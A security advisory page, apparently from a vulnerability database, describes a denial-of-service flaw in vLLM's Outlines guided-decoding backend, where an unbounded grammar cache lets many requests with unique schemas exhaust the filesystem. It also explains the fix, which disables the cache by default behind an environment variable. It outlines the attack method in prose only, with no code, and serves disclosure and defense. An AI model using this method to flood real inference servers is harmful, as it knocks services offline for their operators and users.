Safety vulnerability ID: 76302
The information on this page was manually curated by our Cybersecurity Intelligence Team.
Affected versions of the vLLM package are vulnerable to Denial of Service through unbounded filesystem cache growth in the Outlines guided decoding backend. The outlines_logits_processors.py module fails to limit the size of the grammar compilation cache, allowing unlimited cache entries to be created.
A remote attacker can exploit this vulnerability by sending numerous requests with unique schemas through the OpenAI-compatible API server, causing each request to add a new entry to the cache, resulting in filesystem exhaustion and service unavailability. Additionally, the cache was enabled by default without administrative controls, making all V0 engine deployments vulnerable.
The vulnerability was fixed by disabling the Outlines cache by default and introducing the VLLM_V0_USE_OUTLINES_CACHE environment variable for administrators who wish to explicitly enable it. The V1 engine is not affected by this vulnerability.
Latest version: 0.11.0
A high-throughput and memory-efficient inference and serving engine for LLMs
This vulnerability has no description
Scan your Python project for dependency vulnerabilities in two minutes
Scan your application